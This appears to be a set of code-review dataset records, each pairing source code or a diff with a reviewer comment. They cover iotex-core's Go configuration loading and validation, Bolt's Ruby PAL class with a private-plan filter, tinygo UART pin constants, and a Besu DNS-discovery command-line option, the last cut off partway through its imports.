RelayType string `yaml:"relayType"` RateLimit p2p.RateLimitConfig `yaml:"rateLimit"` EnableRateLimit bool `yaml:"enableRateLimit"` PrivateNetworkPSK string `yaml:"privateNetworkPSK"` } // Chain is the config struct for blockchain package Chain struct { ChainDBPath string `yaml:"chainDBPath"` TrieDBPath string `yaml:"trieDBPath"` IndexDBPath string `yaml:"indexDBPath"` BloomfilterIndexDBPath string `yaml:"bloomfilterIndexDBPath"` CandidateIndexDBPath string `yaml:"candidateIndexDBPath"` StakingIndexDBPath string `yaml:"stakingIndexDBPath"` ID uint32 `yaml:"id"` EVMNetworkID uint32 `yaml:"evmNetworkID"` Address string `yaml:"address"` ProducerPrivKey string `yaml:"producerPrivKey"` SignatureScheme []string `yaml:"signatureScheme"` EmptyGenesis bool `yaml:"emptyGenesis"` GravityChainDB DB `yaml:"gravityChainDB"` Committee committee.Config `yaml:"committee"` EnableTrielessStateDB bool `yaml:"enableTrielessStateDB"` // EnableStateDBCaching enables cachedStateDBOption EnableStateDBCaching bool `yaml:"enableStateDBCaching"` // EnableArchiveMode is only meaningful when EnableTrielessStateDB is false EnableArchiveMode bool `yaml:"enableArchiveMode"` // EnableAsyncIndexWrite enables writing the block actions' and receipts' index asynchronously EnableAsyncIndexWrite bool `yaml:"enableAsyncIndexWrite"` // deprecated EnableSystemLogIndexer bool `yaml:"enableSystemLog"` // EnableStakingProtocol enables staking protocol EnableStakingProtocol bool `yaml:"enableStakingProtocol"` // EnableStakingIndexer enables staking indexer EnableStakingIndexer bool `yaml:"enableStakingIndexer"` // deprecated by DB.CompressBlock CompressBlock bool `yaml:"compressBlock"` // AllowedBlockGasResidue is the amount of gas remained when block producer could stop processing more actions AllowedBlockGasResidue uint64 `yaml:"allowedBlockGasResidue"` // MaxCacheSize is the max number of blocks that will be put into an LRU cache. 
0 means disabled MaxCacheSize int `yaml:"maxCacheSize"` // PollInitialCandidatesInterval is the config for committee init db PollInitialCandidatesInterval time.Duration `yaml:"pollInitialCandidatesInterval"` // StateDBCacheSize is the max size of statedb LRU cache StateDBCacheSize int `yaml:"stateDBCacheSize"` // WorkingSetCacheSize is the max size of workingset cache in state factory WorkingSetCacheSize uint64 `yaml:"workingSetCacheSize"` } // Consensus is the config struct for consensus package Consensus struct { // There are three schemes that are supported Scheme string `yaml:"scheme"` RollDPoS RollDPoS `yaml:"rollDPoS"` } // BlockSync is the config struct for the BlockSync BlockSync struct { Interval time.Duration `yaml:"interval"` // update duration ProcessSyncRequestTTL time.Duration `yaml:"processSyncRequestTTL"` BufferSize uint64 `yaml:"bufferSize"` IntervalSize uint64 `yaml:"intervalSize"` // MaxRepeat is the maximal number of repeat of a block sync request MaxRepeat int `yaml:"maxRepeat"` // RepeatDecayStep is the step for repeat number decreasing by 1 RepeatDecayStep int `yaml:"repeatDecayStep"` } // RollDPoS is the config struct for RollDPoS consensus package RollDPoS struct { FSM ConsensusTiming `yaml:"fsm"` ToleratedOvertime time.Duration `yaml:"toleratedOvertime"` Delay time.Duration `yaml:"delay"` ConsensusDBPath string `yaml:"consensusDBPath"` } // ConsensusTiming defines a set of time durations used in fsm and event queue size ConsensusTiming struct { EventChanSize uint `yaml:"eventChanSize"` UnmatchedEventTTL time.Duration `yaml:"unmatchedEventTTL"` UnmatchedEventInterval time.Duration `yaml:"unmatchedEventInterval"` AcceptBlockTTL time.Duration `yaml:"acceptBlockTTL"` AcceptProposalEndorsementTTL time.Duration `yaml:"acceptProposalEndorsementTTL"` AcceptLockEndorsementTTL time.Duration `yaml:"acceptLockEndorsementTTL"` CommitTTL time.Duration `yaml:"commitTTL"` } // Dispatcher is the dispatcher config Dispatcher struct { EventChanSize uint `yaml:"eventChanSize"` // TODO: explorer dependency deleted at #1085, need to revive by migrating to api } // API is the api service config API struct { UseRDS bool `yaml:"useRDS"` Port int `yaml:"port"` TpsWindow int `yaml:"tpsWindow"` GasStation GasStation `yaml:"gasStation"` RangeQueryLimit uint64 `yaml:"rangeQueryLimit"` } // GasStation is the gas station config GasStation struct { SuggestBlockWindow int `yaml:"suggestBlockWindow"` DefaultGas uint64 `yaml:"defaultGas"` Percentile int `yaml:"Percentile"` } // System is the system config System struct { // Active is the status of the node. True means active and false means stand-by Active bool `yaml:"active"` HeartbeatInterval time.Duration `yaml:"heartbeatInterval"` // HTTPProfilingPort is the port number to access golang performance profiling data of a blockchain node. 
It is // 0 by default, meaning performance profiling has been disabled HTTPAdminPort int `yaml:"httpAdminPort"` HTTPStatsPort int `yaml:"httpStatsPort"` StartSubChainInterval time.Duration `yaml:"startSubChainInterval"` SystemLogDBPath string `yaml:"systemLogDBPath"` } // ActPool is the actpool config ActPool struct { // MaxNumActsPerPool indicates maximum number of actions the whole actpool can hold MaxNumActsPerPool uint64 `yaml:"maxNumActsPerPool"` // MaxGasLimitPerPool indicates maximum gas limit the whole actpool can hold MaxGasLimitPerPool uint64 `yaml:"maxGasLimitPerPool"` // MaxNumActsPerAcct indicates maximum number of actions an account queue can hold MaxNumActsPerAcct uint64 `yaml:"maxNumActsPerAcct"` // ActionExpiry defines how long an action will be kept in action pool. ActionExpiry time.Duration `yaml:"actionExpiry"` // MinGasPriceStr defines the minimal gas price the delegate will accept for an action MinGasPriceStr string `yaml:"minGasPrice"` // BlackList lists the account address that are banned from initiating actions BlackList []string `yaml:"blackList"` } // DB is the config for database DB struct { DbPath string `yaml:"dbPath"` // NumRetries is the number of retries NumRetries uint8 `yaml:"numRetries"` // MaxCacheSize is the max number of blocks that will be put into an LRU cache. 0 means disabled MaxCacheSize int `yaml:"maxCacheSize"` // BlockStoreBatchSize is the number of blocks to be stored together as a unit (to get better compression) BlockStoreBatchSize int `yaml:"blockStoreBatchSize"` // V2BlocksToSplitDB is the accumulated number of blocks to split a new file after v1.1.2 V2BlocksToSplitDB uint64 `yaml:"v2BlocksToSplitDB"` // Compressor is the compression used on block data, used by new DB file after v1.1.2 Compressor string `yaml:"compressor"` // CompressLegacy enables gzip compression on block data, used by legacy DB file before v1.1.2 CompressLegacy bool `yaml:"compressLegacy"` // SplitDBSize is the config for DB's split file size SplitDBSizeMB uint64 `yaml:"splitDBSizeMB"` // SplitDBHeight is the config for DB's split start height SplitDBHeight uint64 `yaml:"splitDBHeight"` // HistoryStateRetention is the number of blocks account/contract state will be retained HistoryStateRetention uint64 `yaml:"historyStateRetention"` } // Indexer is the config for indexer Indexer struct { // RangeBloomFilterNumElements is the number of elements each rangeBloomfilter will store in bloomfilterIndexer RangeBloomFilterNumElements uint64 `yaml:"rangeBloomFilterNumElements"` // RangeBloomFilterSize is the size (in bits) of rangeBloomfilter RangeBloomFilterSize uint64 `yaml:"rangeBloomFilterSize"` // RangeBloomFilterNumHash is the number of hash functions of rangeBloomfilter RangeBloomFilterNumHash uint64 `yaml:"rangeBloomFilterNumHash"` } // Config is the root config struct, each package's config should be put as its sub struct Config struct { Plugins map[int]interface{} `ymal:"plugins"` Network Network `yaml:"network"` Chain Chain `yaml:"chain"` ActPool ActPool `yaml:"actPool"` Consensus Consensus `yaml:"consensus"` BlockSync BlockSync `yaml:"blockSync"` Dispatcher Dispatcher `yaml:"dispatcher"` API API `yaml:"api"` System System `yaml:"system"` DB DB `yaml:"db"` Indexer Indexer `yaml:"indexer"` Log log.GlobalConfig `yaml:"log"` SubLogs map[string]log.GlobalConfig `yaml:"subLogs"` Genesis genesis.Genesis `yaml:"genesis"` } // Validate is the interface of validating the config Validate func(Config) error ) // SplitDBSize returns the configured SplitDBSizeMB func (db DB) 
SplitDBSize() uint64 { return db.SplitDBSizeMB * 1024 * 1024 } // New creates a config instance. It first loads the default configs. If the config path is not empty, it will read from // the file and override the default configs. By default, it will apply all validation functions. To bypass validation, // use DoNotValidate instead. func New(validates ...Validate) (Config, error) { opts := make([]uconfig.YAMLOption, 0) opts = append(opts, uconfig.Static(Default)) opts = append(opts, uconfig.Expand(os.LookupEnv)) if _overwritePath != "" { opts = append(opts, uconfig.File(_overwritePath)) } if _secretPath != "" { opts = append(opts, uconfig.File(_secretPath)) } yaml, err := uconfig.NewYAML(opts...) if err != nil { return Config{}, errors.Wrap(err, "failed to init config") } var cfg Config if err := yaml.Get(uconfig.Root).Populate(&cfg); err != nil { return Config{}, errors.Wrap(err, "failed to unmarshal YAML config to struct") } // set network master key to private key if cfg.Network.MasterKey == "" { cfg.Network.MasterKey = cfg.Chain.ProducerPrivKey } // set plugins for _, plugin := range _plugins { switch strings.ToLower(plugin) { case "gateway": cfg.Plugins[GatewayPlugin] = nil default: return Config{}, errors.Errorf("Plugin %s is not supported", plugin) } } // By default, the config needs to pass all the validation if len(validates) == 0 { validates = Validates } for _, validate := range validates { if err := validate(cfg); err != nil { return Config{}, errors.Wrap(err, "failed to validate config") } } return cfg, nil } // NewSub create config for sub chain. func NewSub(validates ...Validate) (Config, error) { if _subChainPath == "" { return Config{}, nil } opts := make([]uconfig.YAMLOption, 0) opts = append(opts, uconfig.Static(Default)) opts = append(opts, uconfig.Expand(os.LookupEnv)) opts = append(opts, uconfig.File(_subChainPath)) if _secretPath != "" { opts = append(opts, uconfig.File(_secretPath)) } yaml, err := uconfig.NewYAML(opts...) 
if err != nil { return Config{}, errors.Wrap(err, "failed to init config") } var cfg Config if err := yaml.Get(uconfig.Root).Populate(&cfg); err != nil { return Config{}, errors.Wrap(err, "failed to unmarshal YAML config to struct") } // By default, the config needs to pass all the validation if len(validates) == 0 { validates = Validates } for _, validate := range validates { if err := validate(cfg); err != nil { return Config{}, errors.Wrap(err, "failed to validate config") } } return cfg, nil } // SetEVMNetworkID sets the extern chain ID func SetEVMNetworkID(id uint32) { loadChainID.Do(func() { _evmNetworkID = id }) } // EVMNetworkID returns the extern chain ID func EVMNetworkID() uint32 { return atomic.LoadUint32(&_evmNetworkID) } // ProducerAddress returns the configured producer address derived from key func (cfg Config) ProducerAddress() address.Address { sk := cfg.ProducerPrivateKey() addr, err := address.FromBytes(sk.PublicKey().Hash()) if err != nil { log.L().Panic( "Error when constructing producer address", zap.Error(err), ) } return addr } // ProducerPrivateKey returns the configured private key func (cfg Config) ProducerPrivateKey() crypto.PrivateKey { sk, err := crypto.HexStringToPrivateKey(cfg.Chain.ProducerPrivKey) if err != nil { log.L().Panic( "Error when decoding private key", zap.Error(err), ) } if !cfg.whitelistSignatureScheme(sk) { log.L().Panic("The private key's signature scheme is not whitelisted") } return sk } func (cfg Config) whitelistSignatureScheme(sk crypto.PrivateKey) bool { var sigScheme string switch sk.EcdsaPrivateKey().(type) { case *ecdsa.PrivateKey: sigScheme = SigP256k1 case *crypto.P256sm2PrvKey: sigScheme = SigP256sm2 } if sigScheme == "" { return false } for _, e := range cfg.Chain.SignatureScheme { if sigScheme == e { // signature scheme is whitelisted return true } } return false } func generateRandomKey(scheme string) string { // generate a random key switch scheme { case SigP256k1: sk, _ := crypto.GenerateKey() return sk.HexString() case SigP256sm2: sk, _ := crypto.GenerateKeySm2() return sk.HexString() } return "" } // MinGasPrice returns the minimal gas price threshold func (ap ActPool) MinGasPrice() *big.Int { mgp, ok := big.NewInt(0).SetString(ap.MinGasPriceStr, 10) if !ok { log.S().Panicf("Error when parsing minimal gas price string: %s", ap.MinGasPriceStr) } return mgp } // ValidateDispatcher validates the dispatcher configs func ValidateDispatcher(cfg Config) error { if cfg.Dispatcher.EventChanSize <= 0 { return errors.Wrap(ErrInvalidCfg, "dispatcher event chan size should be greater than 0") } return nil } // ValidateRollDPoS validates the roll-DPoS configs func ValidateRollDPoS(cfg Config) error { if cfg.Consensus.Scheme != RollDPoSScheme { return nil } rollDPoS := cfg.Consensus.RollDPoS fsm := rollDPoS.FSM if fsm.EventChanSize <= 0 { return errors.Wrap(ErrInvalidCfg, "roll-DPoS event chan size should be greater than 0") } return nil } // ValidateArchiveMode validates the state factory setting func ValidateArchiveMode(cfg Config) error { if !cfg.Chain.EnableArchiveMode || !cfg.Chain.EnableTrielessStateDB { return nil } return errors.Wrap(ErrInvalidCfg, "Archive mode is incompatible with trieless state DB") } // ValidateAPI validates the api configs func ValidateAPI(cfg Config) error { if cfg.API.TpsWindow <= 0 { return errors.Wrap(ErrInvalidCfg, "tps window is not a positive integer when the api is enabled") } return nil } // ValidateActPool validates the given config func ValidateActPool(cfg Config) error { maxNumActPerPool := 
cfg.ActPool.MaxNumActsPerPool maxNumActPerAcct := cfg.ActPool.MaxNumActsPerAcct if maxNumActPerPool <= 0 || maxNumActPerAcct <= 0 { return errors.Wrap( ErrInvalidCfg, "maximum number of actions per pool or per account cannot be zero or negative", ) } if maxNumActPerPool < maxNumActPerAcct { return errors.Wrap( ErrInvalidCfg, "maximum number of actions per pool cannot be less than maximum number of actions per account", ) } return nil } // ValidateForkHeights validates the forked heights func ValidateForkHeights(cfg Config) error { hu := NewHeightUpgrade(&cfg.Genesis) switch { case hu.PacificBlockHeight() > hu.AleutianBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Pacific is heigher than Aleutian") case hu.AleutianBlockHeight() > hu.BeringBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Aleutian is heigher than Bering") case hu.BeringBlockHeight() > hu.CookBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Bering is heigher than Cook") case hu.CookBlockHeight() > hu.DardanellesBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Cook is heigher than Dardanelles") case hu.DardanellesBlockHeight() > hu.DaytonaBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Dardanelles is heigher than Daytona") case hu.DaytonaBlockHeight() > hu.EasterBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Daytona is heigher than Easter") case hu.EasterBlockHeight() > hu.FbkMigrationBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Easter is heigher than FairbankMigration") case hu.FbkMigrationBlockHeight() > hu.FairbankBlockHeight(): return errors.Wrap(ErrInvalidCfg, "FairbankMigration is heigher than Fairbank") case hu.FairbankBlockHeight() > hu.GreenlandBlockHeight(): return errors.Wrap(ErrInvalidCfg, "Fairbank is heigher than Greenland") } return nil } // DoNotValidate validates the given config func DoNotValidate(cfg Config) error { return nil }
1
23,244
Is 10 too small compared to 1000? Considering that the sync channel is unicast only (vs. the block channel, which is broadcast + unicast), I would say use 200~400 for BlockSyncChanSize. My concern is that this could potentially slow down the sync speed of a full node.
iotexproject-iotex-core
go
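To make the channel-size discussion above concrete, here is a minimal Go sketch of the split dispatcher configuration the diff introduces, with the reviewer's suggested 200~400 range applied to the block-sync channel. The field names come from the patch; the validation helper and its bounds are illustrative assumptions, not the project's actual code.

package config

import "errors"

// Dispatcher splits the old single EventChanSize into per-message-type
// channel sizes, mirroring the field names introduced in the diff.
type Dispatcher struct {
	ActionChanSize    uint `yaml:"actionChanSize"`
	BlockChanSize     uint `yaml:"blockChanSize"`
	BlockSyncChanSize uint `yaml:"blockSyncChanSize"`
}

// validateDispatcher is a hypothetical helper in the spirit of the existing
// ValidateDispatcher: every channel must have a positive size, and the
// block-sync channel is kept within the 200~400 range suggested in the review.
func validateDispatcher(d Dispatcher) error {
	if d.ActionChanSize == 0 || d.BlockChanSize == 0 || d.BlockSyncChanSize == 0 {
		return errors.New("dispatcher channel sizes should be greater than 0")
	}
	if d.BlockSyncChanSize < 200 || d.BlockSyncChanSize > 400 {
		return errors.New("blockSyncChanSize is outside the suggested 200~400 range")
	}
	return nil
}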
@@ -297,7 +297,7 @@ module Bolt errors.each do |error| @logger.warn(error.details['original_error']) end - plans + plans.reject { |plan| get_plan_info(plan.first)['private'] } end end
1
# frozen_string_literal: true require 'bolt/applicator' require 'bolt/executor' require 'bolt/error' require 'bolt/plan_result' require 'bolt/util' require 'etc' module Bolt class PAL BOLTLIB_PATH = File.expand_path('../../bolt-modules', __dir__) MODULES_PATH = File.expand_path('../../modules', __dir__) # PALError is used to convert errors from executing puppet code into # Bolt::Errors class PALError < Bolt::Error # Puppet sometimes rescues exceptions notes the location and reraises. # Return the original error. def self.from_preformatted_error(err) if err.cause&.is_a? Bolt::Error err.cause else from_error(err.cause || err) end end # Generate a Bolt::Pal::PALError for non-bolt errors def self.from_error(err) e = new(err.message) e.set_backtrace(err.backtrace) e end def initialize(msg) super(msg, 'bolt/pal-error') end end attr_reader :modulepath def initialize(modulepath, hiera_config, resource_types, max_compiles = Etc.nprocessors, trusted_external = nil) # Nothing works without initialized this global state. Reinitializing # is safe and in practice only happens in tests self.class.load_puppet @original_modulepath = modulepath @modulepath = [BOLTLIB_PATH, *modulepath, MODULES_PATH] @hiera_config = hiera_config @trusted_external = trusted_external @max_compiles = max_compiles @resource_types = resource_types @logger = Logging.logger[self] if modulepath && !modulepath.empty? @logger.info("Loading modules from #{@modulepath.join(File::PATH_SEPARATOR)}") end @loaded = false end # Puppet logging is global so this is class method to avoid confusion def self.configure_logging Puppet::Util::Log.destinations.clear Puppet::Util::Log.newdestination(Logging.logger['Puppet']) # Defer all log level decisions to the Logging library by telling Puppet # to log everything Puppet.settings[:log_level] = 'debug' end def self.load_puppet if Bolt::Util.windows? # Windows 'fix' for openssl behaving strangely. Prevents very slow operation # of random_bytes later when establishing winrm connections from a Windows host. # See https://github.com/rails/rails/issues/25805 for background. require 'openssl' OpenSSL::Random.random_bytes(1) end begin require 'puppet_pal' rescue LoadError raise Bolt::Error.new("Puppet must be installed to execute tasks", "bolt/puppet-missing") end require 'bolt/pal/logging' require 'bolt/pal/issues' require 'bolt/pal/yaml_plan/loader' require 'bolt/pal/yaml_plan/transpiler' # Now that puppet is loaded we can include puppet mixins in data types Bolt::ResultSet.include_iterable end def setup unless @loaded # This is slow so don't do it until we have to Bolt::PAL.load_puppet # Make sure we don't create the puppet directories with_puppet_settings { |_| nil } @loaded = true end end # Create a top-level alias for TargetSpec and PlanResult so that users don't have to # namespace it with Boltlib, which is just an implementation detail. This # allows them to feel like a built-in type in bolt, rather than # something has been, no pun intended, "bolted on". def alias_types(compiler) compiler.evaluate_string('type TargetSpec = Boltlib::TargetSpec') compiler.evaluate_string('type PlanResult = Boltlib::PlanResult') end # Register all resource types defined in $Boltdir/.resource_types as well as # the built in types registered with the runtime_3_init method. def register_resource_types(loaders) static_loader = loaders.static_loader static_loader.runtime_3_init if File.directory?(@resource_types) # Ruby 2.3 does not support Dir.children (Dir.entries(@resource_types) - %w[. 
..]).each do |resource_pp| type_name_from_file = File.basename(resource_pp, '.pp').capitalize typed_name = Puppet::Pops::Loader::TypedName.new(:type, type_name_from_file) resource_type = Puppet::Pops::Types::TypeFactory.resource(type_name_from_file) loaders.static_loader.set_entry(typed_name, resource_type) end end end # Runs a block in a PAL script compiler configured for Bolt. Catches # exceptions thrown by the block and re-raises them ensuring they are # Bolt::Errors since the script compiler block will squash all exceptions. def in_bolt_compiler # TODO: If we always call this inside a bolt_executor we can remove this here setup r = Puppet::Pal.in_tmp_environment('bolt', modulepath: @modulepath, facts: {}) do |pal| pal.with_script_compiler do |compiler| alias_types(compiler) register_resource_types(Puppet.lookup(:loaders)) if @resource_types begin Puppet.override(yaml_plan_instantiator: Bolt::PAL::YamlPlan::Loader) do yield compiler end rescue Bolt::Error => e e rescue Puppet::PreformattedError => e PALError.from_preformatted_error(e) rescue StandardError => e PALError.from_preformatted_error(e) end end end # Plans may return PuppetError but nothing should be throwing them if r.is_a?(StandardError) && !r.is_a?(Bolt::PuppetError) raise r end r end def with_bolt_executor(executor, inventory, pdb_client = nil, applicator = nil, &block) setup opts = { bolt_executor: executor, bolt_inventory: inventory, bolt_pdb_client: pdb_client, apply_executor: applicator || Applicator.new( inventory, executor, @modulepath, # Skip syncing built-in plugins, since we vendor some Puppet 6 # versions of "core" types, which are already present on the agent, # but may cause issues on Puppet 5 agents. @original_modulepath, pdb_client, @hiera_config, @max_compiles ) } Puppet.override(opts, &block) end def in_plan_compiler(executor, inventory, pdb_client, applicator = nil) with_bolt_executor(executor, inventory, pdb_client, applicator) do # TODO: remove this call and see if anything breaks when # settings dirs don't actually exist. Plans shouldn't # actually be using them. with_puppet_settings do in_bolt_compiler do |compiler| yield compiler end end end end def in_task_compiler(executor, inventory) with_bolt_executor(executor, inventory) do in_bolt_compiler do |compiler| yield compiler end end end # TODO: PUP-8553 should replace this def with_puppet_settings Dir.mktmpdir('bolt') do |dir| cli = [] Puppet::Settings::REQUIRED_APP_SETTINGS.each do |setting| cli << "--#{setting}" << dir end Puppet.settings.send(:clear_everything_for_tests) Puppet.initialize_settings(cli) Puppet::GettextConfig.create_default_text_domain Puppet[:trusted_external_command] = @trusted_external self.class.configure_logging yield end end # Parses a snippet of Puppet manifest code and returns the AST represented # in JSON. 
def parse_manifest(code, filename) setup Puppet::Pops::Parser::EvaluatingParser.new.parse_string(code, filename) rescue Puppet::Error => e raise Bolt::PAL::PALError, "Failed to parse manifest: #{e}" end def list_tasks in_bolt_compiler do |compiler| tasks = compiler.list_tasks tasks.map(&:name).sort.each_with_object([]) do |task_name, data| task_sig = compiler.task_signature(task_name) unless task_sig.task_hash['metadata']['private'] data << [task_name, task_sig.task_hash['metadata']['description']] end end end end def list_modulepath @modulepath - [BOLTLIB_PATH, MODULES_PATH] end def parse_params(type, object_name, params) in_bolt_compiler do |compiler| if type == 'task' param_spec = compiler.task_signature(object_name)&.task_hash&.dig('parameters') elsif type == 'plan' plan = compiler.plan_signature(object_name) param_spec = plan.params_type.elements&.each_with_object({}) { |t, h| h[t.name] = t.value_type } if plan end param_spec ||= {} params.each_with_object({}) do |(name, str), acc| type = param_spec[name] begin parsed = JSON.parse(str, quirks_mode: true) # The type may not exist if the module is remote on orch or if a task # defines no parameters. Since we treat no parameters as Any we # should parse everything in this case acc[name] = if type && !type.instance?(parsed) str else parsed end rescue JSON::ParserError # This value may not be assignable in which case run_* will error acc[name] = str end acc end end end def task_signature(task_name) in_bolt_compiler do |compiler| compiler.task_signature(task_name) end end def get_task_info(task_name) task = task_signature(task_name) if task.nil? raise Bolt::Error.unknown_task(task_name) end task.task_hash.reject { |k, _| k == 'parameters' } end def list_plans in_bolt_compiler do |compiler| errors = [] plans = compiler.list_plans(nil, errors).map { |plan| [plan.name] }.sort errors.each do |error| @logger.warn(error.details['original_error']) end plans end end def get_plan_info(plan_name) plan_sig = in_bolt_compiler do |compiler| compiler.plan_signature(plan_name) end if plan_sig.nil? raise Bolt::Error.unknown_plan(plan_name) end mod = plan_sig.instance_variable_get(:@plan_func).loader.parent.path # If it's a Puppet language plan, use strings to extract data. The only # way to tell is to check which filename exists in the module. plan_subpath = File.join(plan_name.split('::').drop(1)) plan_subpath = 'init' if plan_subpath.empty? pp_path = File.join(mod, 'plans', "#{plan_subpath}.pp") if File.exist?(pp_path) require 'puppet-strings' require 'puppet-strings/yard' PuppetStrings::Yard.setup! YARD::Logger.instance.level = :error YARD.parse(pp_path) plan = YARD::Registry.at("puppet_plans::#{plan_name}") description = if plan.tag(:summary) plan.tag(:summary).text elsif !plan.docstring.empty? plan.docstring end defaults = plan.parameters.reject { |_, value| value.nil? }.to_h parameters = plan.tags(:param).each_with_object({}) do |param, params| name = param.name params[name] = { 'type' => param.types.first } params[name]['default_value'] = defaults[name] if defaults.key?(name) params[name]['description'] = param.text unless param.text.empty? 
end { 'name' => plan_name, 'description' => description, 'parameters' => parameters, 'module' => mod } # If it's a YAML plan, fall back to limited data else yaml_path = File.join(mod, 'plans', "#{plan_subpath}.yaml") plan_content = File.read(yaml_path) plan = Bolt::PAL::YamlPlan::Loader.from_string(plan_name, plan_content, yaml_path) parameters = plan.parameters.each_with_object({}) do |param, params| name = param.name type_str = case param.type_expr when Puppet::Pops::Types::PTypeReferenceType param.type_expr.type_string when nil 'Any' else param.type_expr end params[name] = { 'type' => type_str } params[name]['default_value'] = param.value params[name]['description'] = param.description if param.description end { 'name' => plan_name, 'description' => plan.description, 'parameters' => parameters, 'module' => mod } end end def convert_plan(plan_path) Puppet[:tasks] = true transpiler = YamlPlan::Transpiler.new transpiler.transpile(plan_path) end # Returns a mapping of all modules available to the Bolt compiler # # @return [Hash{String => Array<Hash{Symbol => String,nil}>}] # A hash that associates each directory on the module path with an array # containing a hash of information for each module in that directory. # The information hash provides the name, version, and a string # indicating whether the module belongs to an internal module group. def list_modules internal_module_groups = { BOLTLIB_PATH => 'Plan Language Modules', MODULES_PATH => 'Packaged Modules' } in_bolt_compiler do # NOTE: Can replace map+to_h with transform_values when Ruby 2.4 # is the minimum supported version. Puppet.lookup(:current_environment).modules_by_path.map do |path, modules| module_group = internal_module_groups[path] values = modules.map do |mod| mod_info = { name: (mod.forge_name || mod.name), version: mod.version } mod_info[:internal_module_group] = module_group unless module_group.nil? mod_info end [path, values] end.to_h end end def generate_types require 'puppet/face/generate' in_bolt_compiler do generator = Puppet::Generate::Type inputs = generator.find_inputs(:pcore) FileUtils.mkdir_p(@resource_types) generator.generate(inputs, @resource_types, true) end end def run_task(task_name, targets, params, executor, inventory, description = nil) in_task_compiler(executor, inventory) do |compiler| params = params.merge('_bolt_api_call' => true, '_catch_errors' => true) compiler.call_function('run_task', task_name, targets, description, params) end end def run_plan(plan_name, params, executor = nil, inventory = nil, pdb_client = nil, applicator = nil) in_plan_compiler(executor, inventory, pdb_client, applicator) do |compiler| r = compiler.call_function('run_plan', plan_name, params.merge('_bolt_api_call' => true)) Bolt::PlanResult.from_pcore(r, 'success') end rescue Bolt::Error => e Bolt::PlanResult.new(e, 'failure') end end end
1
13,788
A full parse of each plan here, just to list the plans, will be expensive from both a computation and an IO perspective.
puppetlabs-bolt
rb
@@ -19,3 +19,9 @@ const ( BUTTON3 = 15 BUTTON4 = 16 ) + +// UART pins for NRF52840-DK +const ( + UART_TX_PIN = 6 + UART_RX_PIN = 8 +)
1
// +build nrf,pca10040 package machine // LEDs on the PCA10040 (nRF52832 dev board) const ( LED = LED1 LED1 = 17 LED2 = 18 LED3 = 19 LED4 = 20 ) // Buttons on the PCA10040 (nRF52832 dev board) const ( BUTTON = BUTTON1 BUTTON1 = 13 BUTTON2 = 14 BUTTON3 = 15 BUTTON4 = 16 )
1
5,882
These constants use the `_PIN` suffix, while the other constants don't use it. I'm not sure what is best, but I would prefer to keep this consistent. Do you have an opinion on which it should be (with or without suffix)?
tinygo-org-tinygo
go
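To illustrate the naming question raised above, a small sketch showing the same UART pins under both conventions. The pin numbers (6 and 8) come from the diff; the suffix-less names are hypothetical alternatives shown only for comparison, not existing identifiers.

package machine

// Option 1: with the _PIN suffix, as proposed in the diff.
const (
	UART_TX_PIN = 6
	UART_RX_PIN = 8
)

// Option 2: without the suffix, matching the existing LED/BUTTON constants
// (hypothetical names, for comparison only).
const (
	UART_TX = 6
	UART_RX = 8
)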
@@ -1089,6 +1089,13 @@ public class BesuCommand implements DefaultCommandValues, Runnable { "Specifies the static node file containing the static nodes for this node to connect to") private final Path staticNodesFile = null; + @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. + @CommandLine.Option( + names = { "--dns-discovery-url" }, + description = "Specifies the URL to use for DNS discovery" + ) + private String dnsDiscoveryUrl = null; + private EthNetworkConfig ethNetworkConfig; private JsonRpcConfiguration jsonRpcConfiguration; private GraphQLConfiguration graphQLConfiguration;
1
/* * Copyright ConsenSys AG. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ package org.hyperledger.besu.cli; import static com.google.common.base.Preconditions.checkNotNull; import static java.nio.charset.StandardCharsets.UTF_8; import static java.util.Arrays.asList; import static java.util.Collections.singletonList; import static org.hyperledger.besu.cli.DefaultCommandValues.getDefaultBesuDataPath; import static org.hyperledger.besu.cli.config.NetworkName.MAINNET; import static org.hyperledger.besu.cli.util.CommandLineUtils.DEPENDENCY_WARNING_MSG; import static org.hyperledger.besu.controller.BesuController.DATABASE_PATH; import static org.hyperledger.besu.ethereum.api.graphql.GraphQLConfiguration.DEFAULT_GRAPHQL_HTTP_PORT; import static org.hyperledger.besu.ethereum.api.jsonrpc.JsonRpcConfiguration.DEFAULT_JSON_RPC_PORT; import static org.hyperledger.besu.ethereum.api.jsonrpc.RpcApis.DEFAULT_JSON_RPC_APIS; import static org.hyperledger.besu.ethereum.api.jsonrpc.websocket.WebSocketConfiguration.DEFAULT_WEBSOCKET_PORT; import static org.hyperledger.besu.ethereum.permissioning.GoQuorumPermissioningConfiguration.QIP714_DEFAULT_BLOCK; import static org.hyperledger.besu.metrics.BesuMetricCategory.DEFAULT_METRIC_CATEGORIES; import static org.hyperledger.besu.metrics.MetricsProtocol.PROMETHEUS; import static org.hyperledger.besu.metrics.prometheus.MetricsConfiguration.DEFAULT_METRICS_PORT; import static org.hyperledger.besu.metrics.prometheus.MetricsConfiguration.DEFAULT_METRICS_PUSH_PORT; import static org.hyperledger.besu.nat.kubernetes.KubernetesNatManager.DEFAULT_BESU_SERVICE_NAME_FILTER; import org.hyperledger.besu.BesuInfo; import org.hyperledger.besu.Runner; import org.hyperledger.besu.RunnerBuilder; import org.hyperledger.besu.chainexport.RlpBlockExporter; import org.hyperledger.besu.chainimport.JsonBlockImporter; import org.hyperledger.besu.chainimport.RlpBlockImporter; import org.hyperledger.besu.cli.config.EthNetworkConfig; import org.hyperledger.besu.cli.config.NetworkName; import org.hyperledger.besu.cli.converter.MetricCategoryConverter; import org.hyperledger.besu.cli.converter.PercentageConverter; import org.hyperledger.besu.cli.converter.RpcApisConverter; import org.hyperledger.besu.cli.custom.CorsAllowedOriginsProperty; import org.hyperledger.besu.cli.custom.JsonRPCAllowlistHostsProperty; import 